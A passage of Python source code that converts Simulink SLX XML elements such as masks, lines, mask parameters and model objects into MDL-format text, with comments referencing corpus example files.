str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class LinkData(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<LinkData') and strval.endswith('</LinkData>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.dialogParameterss = [] # found in matlab-central/Dual_Clutch_Trans.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'DialogParameters':
self.dialogParameterss.append(DialogParameters.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'LinkData' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return LinkData(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'LinkData {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.dialogParameterss:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Line(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Line') and strval.endswith('</Line>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.branches = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Branch':
self.branches.append(Branch.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Line' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Line(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Line {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.branches:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class LineDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<LineDefaults') and strval.endswith('</LineDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'LineDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return LineDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'LineDefaults {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class List(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<List') and strval.endswith('</List>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'List' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return List(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'List {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class LogicAnalyzerPlugin(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<LogicAnalyzerPlugin') and strval.endswith('</LogicAnalyzerPlugin>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'LogicAnalyzerPlugin' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return LogicAnalyzerPlugin(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class Mask(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Mask') and strval.endswith('</Mask>')
super().__init__(strval, parent_xml)
self.object_idmdl = Utils.object_idmdl_by_xml_element(self)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.displays = []
self.types = []
self.maskParameters = []
self.dialogControls = []
self.descriptions = []
self.initializations = []
self.helps = []
self.capabilities = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Display':
self.displays.append(Display.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Type':
self.types.append(Type.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'MaskParameter':
self.maskParameters.append(MaskParameter.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'DialogControl':
self.dialogControls.append(DialogControl.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Description':
self.descriptions.append(Description.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Initialization':
self.initializations.append(Initialization.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Capabilities':
self.capabilities.append(Capabilities.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Help':
self.helps.append(Help.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ImageFile':
# the corresponding information does not appear in the mdl file
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Mask' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Mask(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Object {\n' # special
str_ += f'$PropName "MaskObject"\n'
str_ += f'$ObjectID {self.object_idmdl}\n' # TODO: figure out what ObjectID is
str_ += f'$ClassName "Simulink.Mask"\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.displays:
str_ += f'{x.strmdl}\n'
for x in self.types:
str_ += f'{x.strmdl}\n'
if self.maskParameters and len(self.maskParameters) > 1:
str_ += 'Array {\n'
str_ += 'Type "Simulink.MaskParameter"\n'
# PropName attribute is mandatory.
# Notice that there is no leading $
str_ += 'PropName "Parameters"\n'
str_ += f'Dimension {len(self.maskParameters)}\n'
for x in self.maskParameters:
str_ += f'{x.strmdl(is_array_element=True)}\n'
str_ += '}\n'
else:
for x in self.maskParameters:
str_ += f'{x.strmdl(is_array_element=False)}\n'
if self.dialogControls and len(self.dialogControls) > 1:
str_ += 'Array {\n'
str_ += f'Type "{self.dialogControls[0].array_type_or_object_className()}"\n'
# PropName attribute is mandatory.
# Notice that there is no leading $
str_ += 'PropName "DialogControls"\n'
str_ += f'Dimension {len(self.dialogControls)}\n'
for x in self.dialogControls:
str_ += f'{x.strmdl(is_array_element=True)}\n'
str_ += '}\n'
else:
for x in self.dialogControls:
str_ += f'{x.strmdl(is_array_element=False)}\n'
for x in self.descriptions:
str_ += f'{x.strmdl}\n'
for x in self.initializations:
str_ += f'{x.strmdl}\n'
for x in self.helps:
str_ += f'{x.strmdl}\n'
for x in self.capabilities:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class MaskDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<MaskDefaults') and strval.endswith('</MaskDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.displays = []
self.maskParameters = []
self.dialogControls = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Display':
self.displays.append(Display.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'MaskParameter':
self.maskParameters.append(MaskParameter.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'DialogControl':
self.dialogControls.append(DialogControl.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'MaskDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return MaskDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'MaskDefaults {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.displays:
str_ += f'{x.strmdl}\n'
# although <MaskDefaults> contains <DialogControl>, the information
# about the contained <DialogControl> and its children (<ControlOptions>) is
# not present in the mdl file. So, it is not included in the mdl string
# for x in self.dialogControls:
# str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
# special: appears outside the parent
for x in self.maskParameters:
str_ += f'{x.strmdl(is_array_element=False)}\n'
return str_
class MaskParameter(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<MaskParameter') and strval.endswith('</MaskParameter>')
super().__init__(strval, parent_xml)
self.object_idmdl = Utils.object_idmdl_by_xml_element(self)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.prompts = []
self.values = []
self.typeOptions = []
self.callbacks = []
self.ranges = []
self.tabNames = [] # first found in corpus/github/Lib_Cntrl_FirstOrderActuator_TMATS.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Prompt':
self.prompts.append(Prompt.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Value':
self.values.append(Value.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'TypeOptions':
self.typeOptions.append(TypeOptions.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Callback':
self.callbacks.append(Callback.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Range':
self.ranges.append(Range.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'TabName':
self.tabNames.append(TabName.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'MaskParameter' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return MaskParameter(xml_element.strval, xml_element.parent_xml)
def strmdl(self, is_array_element):
"""
Args:
is_array_element (bool): True if the returned str is to be wrapped inside Array{}, else False
"""
# special
if self.parent_xml.tag == 'MaskDefaults': # see automotive/sldemo_autotrans
element_name = 'MaskParameterDefaults'
elif self.parent_xml.tag == 'Mask': # see automotive/sldemo_autotrans
element_name = 'Object'
else:
raise Exception(f"Element name for <MaskParameter> not decided")
str_ = f'{element_name} {{\n'
# OBSERVATION: If multiple <MaskParameter> are contained in a parent tag (eg. <Mask>),
# they are wrapped in Array{}
#
# <MaskParameter> become Object {} in mdl and they contain $ObjectID, $PropName, and
# $ClassName.
#
# When they are wrapped in Array{}, in original mdl files (generated by Simulink)
# - $ PropName is moved out (becomes a MANDATORY attribute of Array and renamed to
# Propname i.e. no leading $)
# - $ClassName is removed (THIS IS DIFFERENT IN <DialogControl>)
# - $ObjectID remains the same.
#
# Although keeping $PropName, and $ClassName inside these wrapped Object{}s
# does not harm, we have chosen to remove them just like in the mdl file produced by Simulink.
if element_name == 'Object':
str_ += f'$ObjectID {self.object_idmdl}\n' # TODO: figure out what ObjectID is
if not is_array_element:
str_ += f'$PropName "Parameters"\n'
str_ += f'$ClassName "Simulink.MaskParameter"\n'
# TODO: mdl contains 'Prompt'. What is it? (see dma/ex_modeling_simple_system)
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.prompts:
str_ += f'{x.strmdl}\n'
# special
for x in self.values:
str_ += f'{x.strmdl}\n'
# special: inferred from corpus/matlab-central/Link_A.slx
# Even if 'Value' does not appear in attributes or inner tags of <MaskParameter>,
# the corresponding mdl format still has 'Value' (set to "").
if not self.values: # if empty
for x in self.attrs:
if x.name == 'Value':
break
else: # none of the attributes has name 'Value'
str_ += f'Value ""\n'
for x in self.typeOptions:
str_ += f'{x.strmdl}\n'
for x in self.callbacks:
str_ += f'{x.strmdl}\n'
for x in self.ranges:
str_ += f'{x.strmdl}\n'
for x in self.tabNames:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class MaskParameterDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<MaskParameterDefaults') and strval.endswith('</MaskParameterDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'MaskParameterDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return MaskParameterDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'MaskParameterDefaults {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class MATStruct(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<MATStruct') and strval.endswith('</MATStruct>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.fields = []
self.arrays = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Field':
self.fields.append(Field.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'MATStruct' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return MATStruct(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'MATStruct {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.fields:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class ModelOrLibraryOrSubsystem(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert (strval.startswith('<Model') and strval.endswith('</Model>')) or (strval.startswith('<Library') and strval.endswith('</Library>')) or (strval.startswith('<Subsystem') and strval.endswith('</Subsystem>'))
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.configManagerSettings = []
self.editorSettings = []
self.simulationSettings = []
self.externalModes = []
self.modelReferenceSettings = []
self.concurrentExecutionSettings = []
self.systems = []
self.diagnosticSuppressors = []
self.logicAnalyzerPlugins = []
self.notesPlugins = []
self.sLCCPlugins = []
self.webScopes_FoundationPlugins = []
self.arrays = []
self.graphicalInterfaces = []
self.userParameters = []
self.modelWorkspaces = []
self.objects = []
self.windowsInfos = []
self.configSets = []
self.blockDiagramDefaults = []
self.verifications = [] # found in matlab-central/Baro_Library.slx
self.configurationSets = [] # found in matlab-central/Baro_Library.slx
self.systemDefaultss = [] # found in matlab-central/Baro_Library.slx
self.blockDefaultss = [] # found in matlab-central/Baro_Library.slx
self.annotationDefaultss = [] # found in matlab-central/Baro_Library.slx
self.lineDefaultss = [] # found in matlab-central/Baro_Library.slx
self.maskDefaultss = [] # found in matlab-central/Baro_Library.slx
self.maskParameterDefaultss = [] # found in matlab-central/Baro_Library.slx
self.blockParameterDefaultss = [] # found in matlab-central/Baro_Library.slx
self.engineSettingss = [] # found in matlab-central/Assembly_Quadrotor.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ConfigManagerSettings':
self.configManagerSettings.append(ConfigManagerSettings.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'EditorSettings':
self.editorSettings.append(EditorSettings.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'SimulationSettings':
self.simulationSettings.append(SimulationSettings.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ExternalMode':
self.externalModes.append(ExternalMode.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ModelReferenceSettings':
self.modelReferenceSettings.append(ModelReferenceSettings.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ConcurrentExecutionSettings':
self.concurrentExecutionSettings.append(ConcurrentExecutionSettings.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'System':
self.systems.append(System.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'DiagnosticSuppressor':
self.diagnosticSuppressors.append(DiagnosticSuppressor.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'LogicAnalyzerPlugin':
self.logicAnalyzerPlugins.append(LogicAnalyzerPlugin.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'NotesPlugin':
self.notesPlugins.append(NotesPlugin.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'SLCCPlugin':
self.sLCCPlugins.append(SLCCPluginPlugin.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'WebScopes_FoundationPlugin':
self.webScopes_FoundationPlugins.append(WebScopes_FoundationPlugin.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'GraphicalInterface':
self.graphicalInterfaces.append(GraphicalInterface.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'UserParameters':
self.userParameters.append(UserParameters.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ModelWorkspace':
self.modelWorkspaces.append(ModelWorkspace.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'WindowsInfo':
self.windowsInfos.append(WindowsInfo.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ConfigSet':
self.configSets.append(ConfigSet.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'BlockDiagramDefaults':
self.blockDiagramDefaults.append(BlockDiagramDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Verification':
self.verifications.append(Verification.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ConfigurationSet':
self.configurationSets.append(ConfigurationSet.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'SystemDefaults':
self.systemDefaultss.append(SystemDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'BlockDefaults':
self.blockDefaultss.append(BlockDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'AnnotationDefaults':
self.annotationDefaultss.append(AnnotationDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'LineDefaults':
self.lineDefaultss.append(LineDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'MaskDefaults':
self.maskDefaultss.append(MaskDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'MaskParameterDefaults':
self.maskParameterDefaultss.append(MaskParameterDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'BlockParameterDefaults':
self.blockParameterDefaultss.append(BlockParameterDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'EngineSettings':
self.engineSettingss.append(EngineSettings.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ModelOrLibraryOrSubsystem' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ModelOrLibraryOrSubsystem(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = f'{self.tag} {{\n' # can be Model or Library
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.configManagerSettings:
str_ += f'{x.strmdl}\n'
for x in self.editorSettings:
str_ += f'{x.strmdl}\n'
for x in self.simulationSettings:
str_ += f'{x.strmdl}\n'
for x in self.externalModes:
str_ += f'{x.strmdl}\n'
for x in self.modelReferenceSettings:
str_ += f'{x.strmdl}\n'
for x in self.concurrentExecutionSettings:
str_ += f'{x.strmdl}\n'
for x in self.systems:
str_ += f'{x.strmdl}\n'
for x in self.diagnosticSuppressors:
str_ += f'{x.strmdl}\n'
for x in self.logicAnalyzerPlugins:
str_ += f'{x.strmdl}\n'
for x in self.notesPlugins:
str_ += f'{x.strmdl}\n'
for x in self.sLCCPlugins:
str_ += f'{x.strmdl}\n'
for x in self.webScopes_FoundationPlugins:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
for x in self.graphicalInterfaces:
str_ += f'{x.strmdl}\n'
for x in self.userParameters:
str_ += f'{x.strmdl}\n'
for x in self.modelWorkspaces:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
for x in self.windowsInfos:
str_ += f'{x.strmdl}\n'
for x in self.configSets:
str_ += f'{x.strmdl}\n'
for x in self.blockDiagramDefaults:
str_ += f'{x.strmdl}\n'
for x in self.verifications:
str_ += f'{x.strmdl}\n'
for x in self.configurationSets:
str_ += f'{x.strmdl}\n'
for x in self.systemDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.blockDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.annotationDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.lineDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.maskDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.maskParameterDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.blockParameterDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.engineSettingss:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
str_ = Utils.remove_multiple_linegaps(str_)
str_ = Utils.replacements4mdl(str_)
str_ = Utils.remove_multiple_linegaps_between_consecutive_closing_braces(str_)
return str_
class ModelReference(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ModelReference') and strval.endswith('</ModelReference>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ModelReference' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ModelReference(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'ModelReference {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class ModelReferenceSettings(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ModelReferenceSettings') and strval.endswith('</ModelReferenceSettings>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ModelReferenceSettings' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ModelReferenceSettings(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class ModelWorkspace(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ModelWorkspace') and strval.endswith('</ModelWorkspace>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ModelWorkspace' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ModelWorkspace(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class NotesPlugin(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<NotesPlugin') and strval.endswith('</NotesPlugin>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'NotesPlugin' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return NotesPlugin(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class Object(XmlElement):
# TODO: what is $ObjectID in mdl? (this is generated)
# there isObjectID in xml but that does not match mdl's $ObjectID
# figure out how to generate it
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Object') and strval.endswith('</Object>')
super().__init__(strval, parent_xml)
self.object_idmdl = Utils.object_idmdl_by_xml_element(self)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.arrays = []
self.objects = [] # <Object> can contain children <Object>
self.customPropertys = [] # first found in corpus/github-downloaded/CSEI_u.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'CustomProperty':
self.customPropertys.append(CustomProperty.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Object' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Object(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
# special
# these <Object> tags are found in configSet0.xml
if self.attr_value_by_name('ClassName') in [
'Simulink.ConfigSet',
'Simulink.SolverCC',
'Simulink.DataIOCC',
'Simulink.OptimizationCC',
'Simulink.DebuggingCC',
'Simulink.HardwareCC',
'Simulink.ModelReferenceCC',
'Simulink.SFSimCC',
'Simulink.RTWCC',
'SlCovCC.ConfigComp',
'hdlcoderui.hdlcc'
]:
element_name = self.attr_value_by_name('ClassName')
else:
element_name = 'Object' # default
str_ = f'{element_name} {{\n'
for x in self.attrs:
name = x.name
value = x.value
if x.name in ['ClassName', 'ObjectID', 'PropName']:
name = '$' + name
if x.name in ['BackupClass', 'ClassName', 'PropName', 'Version']:
value = f'"{x.value}"'
if x.name == 'ObjectID':
value = self.object_idmdl
str_ += f'{name} {value}\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
for x in self.customPropertys:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Option(XmlElement):
# first found in design-model-behavior/prioritydemo
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Option') and strval.endswith('</Option>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Option(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Cell "{self.content}"'
class Outport(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Outport') and strval.endswith('</Outport>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Outport' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Outport(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Outport {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class P(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<P') and strval.endswith('</P>')
super().__init__(strval, parent_xml)
self.name_attr = None
self.class_attr = None
for x in self.attrs:
if x.name == 'Name':
